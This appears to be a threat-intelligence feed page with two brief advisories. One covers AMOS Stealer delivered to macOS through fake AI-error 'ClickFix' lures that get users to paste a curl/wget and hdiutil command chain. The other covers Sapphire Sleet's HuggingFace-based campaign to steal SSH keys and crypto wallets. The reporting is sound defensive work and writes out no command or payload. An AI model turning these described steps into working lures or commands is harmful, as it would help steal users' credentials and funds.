FILTERING BY: CLEAR FILTER

AMOS Stealer Deployment via ClickFix Social Engineering on macOS

Threat actors are deploying the AMOS Stealer on macOS by adapting the "ClickFix" social engineering technique. The attack leverages browser-based lures masquerading as AI tool errors (e.g., ChatGPT, Grok), prompting users to manually copy and execute a malicious command in the macOS Terminal. This sequence bypasses browser security and Gatekeeper by utilizing curl or wget to download a DMG file, which is then silently mounted via hdiutil. The primary objective is the exfiltration of browser passwords, session cookies, and cryptocurrency wallets.

Sapphire Sleet Targets HuggingFace and macOS for Cryptocurrency Exfiltration

North Korean state-sponsored actor Sapphire Sleet (UNC1069) has launched a targeted campaign against macOS users within the AI/ML and cryptocurrency sectors. The adversary utilizes HuggingFace as a delivery vector, deploying malicious models and repository-based lures coupled with AI-enhanced social engineering to compromise developer environments. Once execution is achieved via macOS-specific payloads, the threat actor deploys specialized modules to harvest SSH keys and exfiltrate cryptocurrency wallet data. This shift indicates a tactical pivot toward high-value individual targets and the exploitation of trust in AI model repositories to bypass traditional perimeter defenses.


LINK COPIED TO CLIPBOARD